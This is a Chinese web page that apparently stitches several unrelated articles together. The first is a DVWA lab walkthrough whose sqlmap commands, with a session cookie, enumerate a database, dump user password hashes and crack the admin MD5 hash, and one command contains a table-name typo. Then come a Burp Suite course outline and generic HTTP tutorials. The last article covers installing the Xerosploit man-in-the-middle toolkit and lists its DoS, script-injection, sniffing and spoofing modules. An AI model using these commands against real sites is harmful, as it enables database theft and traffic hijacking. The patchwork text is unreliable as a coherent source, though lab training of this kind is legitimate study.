前面的几篇文章,我们已经简单介绍了SQL注入攻击和DVWA实验环境的搭建,详见初识渗透测试—最常见黑客攻击方式SQL注入简介,黑客常利用的漏洞?Windows下安装DVWA漏洞测试环境。今天我们就开始第一个攻击实验DVWA下的SQL注入!
1、实验环境介绍
攻击机 Kali Linux IP192.168.11.1
靶机 Win7 IP192.168.11.128
所使用的工具:SQLmap,火狐浏览器下的Tamper Data,DVWA漏洞环境
2、首先我们使用攻击机访问靶机下搭建的DVWA页面。(地址为http://192.168.11.128/dvwa/)
3、使用火狐浏览器自带的插件Tamper Data(没有安装的小伙伴可以去菜单-附加组件-搜索安装,并在工具下打开使用),查看Web应用后台提交给目标服务器的POST参数,Cookie值等数据。访问SQL注入页面,使用Tamper Data查看提交的数据。
访问SQL注入页面
Tamper Data获取到的访问请求数据
获取目标URL和Cookie值
3、下面使用SQLmap 扫描,参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk'
这句指令 -u 就是刚才Tamper Data获取的目标URL,使用 --cookie参数就为了使用当前会话Cookie,对漏洞页面进行持续扫描。
通过扫描这个页面,我们的扫描结果已经把这个站点的详细信息列了出来,并且存在SQL注入点(如果不存在,我这个实验环境不白搭了吗。。。),该站点数据库版本信息为MySQL 5.0,Web应用版本为PHP 7.1.11, Apache 2.4.29。
4、下一步我们就来获取这个MySQL数据库名。参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' --dbs -v
使用 --dbs 参数就可以探测所包含的数据库名称,扫描结果显示出了Web应用的数据库DVWA。
扫描过程
扫描结果
5、接下来,使用以下参数来查询dvwa数据库中的表名,参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' -D dvwa --tables
这个参数中 -D 就是指定数据库 --table就是列出表名
6、发现一个敏感的的表 users ,下面就来列出 users 表中的字段列表。参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' -D dvwa --tables -T userd --columns
这个指令中 -T 参数是指定表名 ,--columns参数可以获取该表中的字段。
7、可以看到有一个非常吸引人的字段 password,下面就把这个字段内容下载出来。参数如下
root@kali:~# sqlmap -u 'http://192.168.11.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit' --cookie='security=low; PHPSESSID=9d83ls1op19rjq1c2j0tih9smk' -D dvwa --tables -T users --columns --dump
这个指令中的 --dump选项可以获取到这个站点所有的用户名和密码的哈希值
字段内容
8、这时候我们就已经获取了admin用户的密码哈希加密值,这条加密值我们可以通过网上破解MD5加密的站点进行解密。小编也随便找了一个解密网站对admin用户名的密码哈希值进行了解密,其内容为password。
解密MD5
这只是实验环境,我们能轻易获取到后台管理员的用户名和密码。实际环境与此相比要困难的多,小伙伴们进行实验时有什么问题可以评论在下方,小编会及时回答,指令的输入要注意格式的规范。切记不要对站点进行恶意攻击,做一个遵纪守法的好公民。
有很多小伙伴比较喜欢这方面的内容,想要进行深入的学习,小编以后会常更新一些关于信息安全、网络技术、电脑知识、科技等方面的内容,喜欢的小伙伴可以关注我,我也会持续不断的为大家带来用心创作的内容以及分享一些资源、学习资料。最后
计更新
章节一:Burp Suite入门
1、Burp Suite简介
2、安装Burp Suite
3、配置Burp Suite代理
章节二:HTTP基础知识
1、HTTP协议基础
2、HTTP请求方法
3、HTTP响应状态码
章节三:Burp Suite代理使用
1、拦截HTTP请求
2、修改HTTP请求
3、发送HTTP请求
章节四:Burp Suite目标分析
1、目标列表
2、目标作用域
3、目标扫描
章节五:Burp Suite漏洞扫描
1、漏洞扫描器简介
2、漏洞扫描配置
3、漏洞扫描结果分析
章节六:Burp Suite拓展插件
1、插件简介
2、插件安装
3、插件开发
章节七:Burp Suite攻击测试
1、SQL注入
2、跨站脚本攻击
3、文件包含漏洞
章节八:Burp Suite高级使用
1、会话管理
2、自动化测试
3、数据包重放
章节九:Burp Suite与其他工具的结合使用
1、Metasploit结合使用
2、Nmap结合使用
3、Wireshark结合使用
章节十:Burp Suite安全与防御
1、Burp Suite安全配置
2、Burp Suite防御措施
3、Burp Suite安全最佳实践
HTTP协议是现代网络通信中最常用的协议之一,它是一种无状态的协议,用于客户端和服务器之间的通信。HTTP协议的基础是请求-响应模型,即客户端向服务器发送请求,服务器返回相应的响应。在本文中,我们将深入探讨HTTP协议的基础知识,包括HTTP的工作流程、HTTP请求和响应的结构以及HTTP请求方法和响应状态码等。
HTTP工作流程
HTTP协议的工作流程可以简单地描述为客户端向服务器发送请求,服务器接收请求并返回响应。具体而言,客户端通过向服务器发送HTTP请求来请求服务器上的资源,例如文档、图像或视频等。服务器收到请求后,根据请求的内容和其他相关信息,生成一个HTTP响应,并将其发送回客户端。这个过程通常称为“请求-响应周期”。
HTTP请求和响应结构
HTTP请求由三个部分组成:请求行、消息头和消息正文。请求行包含请求方法、请求URL和HTTP协议版本。消息头包含一些与请求相关的元数据,例如用户代理、内容类型和内容长度等。消息正文包含请求的数据,例如表单数据或上传的文件。
HTTP响应也由三个部分组成:状态行、消息头和消息正文。状态行包含HTTP协议版本、状态码和状态消息。状态码表示服务器对请求的响应类型,例如200表示成功,404表示未找到,500表示服务器内部错误等。消息头包含与响应相关的元数据,例如服务器类型、内容类型和内容长度等。消息正文包含响应的数据,例如HTML文档、图像或视频等。
HTTP请求方法
HTTP定义了多种请求方法,其中最常用的是GET和POST方法。GET方法用于从服务器获取资源,通常用于获取Web页面、图像和其他类型的文件。POST方法用于将数据发送到服务器,通常用于提交表单、上传文件和执行其他类型的操作。
HTTP响应状态码
HTTP响应状态码指示服务器对请求的响应类型。以下是一些常见的HTTP响应状态码:
200 OK:请求已成功处理,并返回所请求的数据。
301 Moved Permanently:所请求的资源已永久移动到新的URL。
404 Not Found:所请求的资源未找到。
500 Internal Server Error:服务器发生了内部错误。
总结
HTTP协议是现代Web应用程序中最常用的协议之一,它使用请求-响应模型进行通信,并由请求行、消息头和消息正文组成。HTTP定义了多种请求方法,其中最常用的是GET和POST方法,而HTTP响应状态码指示服务器对请求的响应类型。对于Web开发者来说,理解HTTP协议及其工作原理是至关重要的,因为它是Web应用程序的基础。
HTTP(HyperText Transfer Protocol,超文本传输协议)是一种用于客户端和服务器之间通信的协议。HTTP请求方法是HTTP协议的重要组成部分,用于定义客户端向服务器发送请求的方式和类型。在本文中,我们将深入探讨HTTP请求方法的各个方面,包括常见的请求方法、请求头和请求体等。
HTTP请求方法
HTTP定义了多种请求方法,其中最常用的是GET和POST方法。以下是一些常见的HTTP请求方法:
1. GET方法
GET方法用于从服务器获取资源,通常用于获取Web页面、图像和其他类型的文件等。GET请求是一种安全的请求方法,因为它只是从服务器获取资源而不对服务器做出任何修改。GET请求通常在URL中包含查询参数,例如:
```
http://example.com/page?param1=value1¶m2=value2
```
在上面的URL中,`http://example.com/page`是服务器上的资源,`param1`和`param2`是查询参数,`value1`和`value2`是参数的值。
2. POST方法
POST方法用于将数据发送到服务器,通常用于提交表单、上传文件和执行其他类型的操作。POST请求可以包含请求体,请求体中包含要发送到服务器的数据。POST请求在URL中不包含查询参数,数据通常包含在请求体中。例如:
```
POST /submitform HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
username=johndoe&password=password123
```
在上面的请求中,`POST`是请求方法,`/submitform`是服务器上的资源,`username`和`password`是表单字段,`johndoe`和`password123`是字段的值。
3. HEAD方法
HEAD方法与GET方法类似,但它只获取资源的头部信息而不返回资源的内容。这个方法通常用于客户端需要了解资源的元数据,例如资源的类型、大小或最后修改时间等。
4. PUT方法
PUT方法用于向服务器上传文件或其他数据。PUT请求通常包含请求体,请求体中包含要上传的数据。PUT请求可以用于创建或更新服务器上的资源。例如:
```
PUT /file.txt HTTP/1.1
Host: example.com
Content-Type: text/plain
Content-Length: 10
Hello World
```
在上面的请求中,`PUT`是请求方法,`/file.txt`是服务器上的资源,`text/plain`是内容类型,`Hello World`是要上传的数据。
5. DELETE方法
DELETE方法用于从服务器删除资源。DELETE请求通常不包含请求体,因为它只是从服务器删除资源而不修改资源的内容。例如:
```
DELETE /file.txt HTTP/1.1
Host: example.com
```
在上面的请求中,`DELETE`是请求方法,`/file.txt`是服务器上的资源。
HTTP请求头
HTTP请求头是HTTP请求中的一部分,用于包含与请求相关的元数据。以下是一些常见的HTTP请求头:
1. User-Agent
User-Agent头包含客户端的信息,例如客户端的名称、版本和操作系统等。
2. Accept
Accept头包含客户端所能接受的响应类型,例如HTML、XML或JSON等。
3. Content-Type
Content-Type头包含请求体的内容类型,例如text/plain、application/json或multipart/form-data等。
HTTP请求体
HTTP请求体是HTTP请求的一部分,用于包含要发送到服务器的数据。请求体通常出现在POST和PUT请求中。请求体的格式取决于Content-Type头的值。以下是一些常见的请求体格式:
1. application/x-www-form-urlencoded
这是最常见的请求体格式,用于将表单数据编码为键值对。例如:
```
username=johndoe&password=password123
```
2. application/json
这个格式通常用于将数据编码为JSON格式。例如:
```
{
"username": "johndoe",
"password": "password123"
}
```
HTTP请求方法的总结
HTTP请求方法是HTTP协议的重要组成部分,用于定义客户端向服务器发送请求的方式和类型。常见的HTTP请求方法包括GET、POST、HEAD、PUT和DELETE。HTTP请求头和请求体也是HTTP请求的重要组成部分,用于包含与请求相关的元数据和要发送到服务器的数据。了解HTTP请求方法和相关的头部和体,对于Web开发和网络通信是非常重要的。
在HTTP协议中,响应状态码是服务器用来向客户端传递请求处理结果的一种方式。响应状态码是由3个数字组成的代码,每个数字代表不同的意义。在本文中,我们将介绍HTTP响应状态码的各种类型、每个状态码的含义以及如何处理它们。
## HTTP响应状态码类型
HTTP响应状态码被分为5种类型,分别以不同的数字开头。这些数字的含义如下:
- 1xx:信息性响应。指示请求已接收,继续处理。
- 2xx:成功响应。指示请求已成功处理。
- 3xx:重定向响应。指示客户端必须采取进一步的操作才能完成请求。
- 4xx:客户端错误响应。指示客户端发生错误,例如请求的URL不存在或请求的参数无效。
- 5xx:服务器错误响应。指示服务器发生错误,例如服务器无法响应或服务器内部错误。
下面我们将详细介绍每种类型的响应状态码。
## 信息性响应
1xx状态码用于向客户端发送一些信息,以便客户端知道服务器正在处理请求。这些状态码不代表请求的成功或失败。
以下是一些常见的1xx状态码:
- 100 Continue:服务器已经接收到请求头,并且客户端应该继续发送请求体。
- 101 Switching Protocols:客户端请求切换协议,例如从HTTP到WebSocket。
## 成功响应
2xx状态码用于向客户端发送请求已成功处理的消息。常见的2xx状态码有:
- 200 OK:请求已成功处理。
- 201 Created:新资源已成功创建。
- 204 No Content:请求已成功处理,但没有响应体。
## 重定向响应
3xx状态码用于重定向客户端请求。这些状态码通常表示客户端必须采取进一步的操作才能完成请求。
以下是一些常见的3xx状态码:
- 300 Multiple Choices:请求的资源有多个选择。
- 301 Moved Permanently:请求的资源已永久移动到新位置。
- 302 Found:请求的资源已暂时移动到新位置。
- 303 See Other:请求的资源可在另一个URL下找到。
- 304 Not Modified:客户端缓存的资源与服务器上的版本相同,无需重新传输。
- 307 Temporary Redirect:请求的资源已暂时移动到新位置。
## 客户端错误响应
4xx状态码用于指示客户端发生错误。这些状态码通常表示请求无效或无法完成。
以下是一些常见的4xx状态码:
- 400 Bad Request:请求无效。
- 401 Unauthorized:请求需要身份验证。
- 403 Forbidden:服务器拒绝请求。
- 404 Not Found:请求的资源不存在。
- 405 Method Not Allowed:请求方法不被允许。
- 409 Conflict:请求与当前资源状态冲突。
- 415 Unsupported Media Type:请求的媒体类型不受支持。
## 服务器错误响应
5xx状态码用于指示服务器发生错误。这些状态码通常表示服务器无法响应或服务器内部错误。
以下是一些常见的5xx状态码:
- 500 Internal Server Error:服务器内部错误。
- 501 Not Implemented:服务器不支持请求的功能。
- 502 Bad Gateway:服务器作为网关或代理,从上游服务器接收到无效的响应。
- 503 Service Unavailable:服务器暂时无法处理请求。
- 504 Gateway Timeout:服务器作为网关或代理,等待上游服务器超时。
## 处理HTTP响应状态码
在处理HTTP响应状态码时,我们需要根据状态码采取不同的行动。以下是我们应该采取的一些行动:
- 1xx状态码:通常无需额外处理,只需等待服务器处理请求即可。
- 2xx状态码:请求已成功处理,如果有响应体,则将其解析并使用。
- 3xx状态码:根据状态码采取进一步行动,例如根据Location头重定向到新的URL。
- 4xx状态码:检查请求,例如检查URL或请求参数是否正确。如果请求无效,则更正请求并重试。
- 5xx状态码:等待服务器恢复,并在必要时重试请求。
## 总结
HTTP响应状态码是服务器用来向客户端传递请求处理结果的一种方式。状态码被分为5种类型,每个类型代表不同的含义。在处理HTTP响应状态码时,我们需要根据状态码采取不同的行动。了解HTTP响应状态码的含义和处理方法可以帮助我们更好地处理HTTP请求和响应。
点击以下链接,学习更多技术!
林瑞木的网络课堂,林瑞木 网络管理,Linux 大讲堂 - 51CTO学堂高级讲师
×00 前言
偶然间,在国外网站的一篇文章中发现有提到这款中间人框架,顺藤摸瓜拿来实践一番,发现确实很可以,确实很方便,不敢独享,特来抛砖引玉,不足之处还望斧正~
0×01 工具介绍
Xerosploit是一款可以进行中间人攻击的渗透测试工具包。它具有多种模块,可以进行多重有效的攻击,如拒绝服务和端口扫描、劫持等。由bettercap和nmap强力驱动。
0×02 工具安装
git clone https://github.com/LionSec/xerosploit
cd xerosploit && sudo python install.py
sudo xerosploit
在kali中很顺利的就安装成功了。
默认会自动列出本机的网卡信息,以备后续使用。
0×03 模块介绍
输入’help’来了解工具的使用。
输入’scan’来扫描当前所在局域网主机信息。
输入’192.168.0.102′来选定攻击目标。
本地win10:192.168.0.102
虚拟机kali:192.168.0.111
输入’help’来查看可对目标进行攻击的模块。
pscan:端口扫描
dos:对目标进行dos攻击
ping:对目标进行ping是否存活
injecthtml:将html注入到目标访问的网站中
injectjs:将javascript注入到目标访问的网站中
rdownload:替换目标下载的文件
sniff:嗅探目标的流量信息
dspoof:将所有http流量重定向到特定ip
yplay:在目标的浏览器中后台播放youtube视频(还得fq)
replace:替换目标访问网站的所有图片
driftnet:查看目标访问网站的所有图片
move:让目标访问网站变得抖动
deface:将目标访问网站的所有页面替换成自己定义的html代码
0×04 模块使用
这里就介绍几个好玩、方便展示的模块利用,其他的大家就慢慢探索把玩好了~~
pscan模块
端口默认只扫描1000个端口,调用nmap接口。
injecthtml模块
test.html
<h1 style="font-size:50px;">hack fun</h1>
sniff模块
*由于本人所在网络环境复杂,演示过程中出现win10机器无网络现象,不知道是工具缺陷问题,还是本机网卡问题?
Xerosploit的作者在YouTube也有演示视频。
0×05 总结
正如作者在github中介绍道:Xerosploit由bettercap和nmap提供驱动,个人觉得是神器结合体,让中间人攻击更加傻瓜化,更加方便快捷,一般用到的功能都有了,至于怎么玩,就看脑洞大不大了~
*本文原创作者:补丁君,转载须注明来自FreeBuf.COM
如有侵权请联系 watch.dog@qq.com.
*请认真填写需求信息,我们会在24小时内与您取得联系。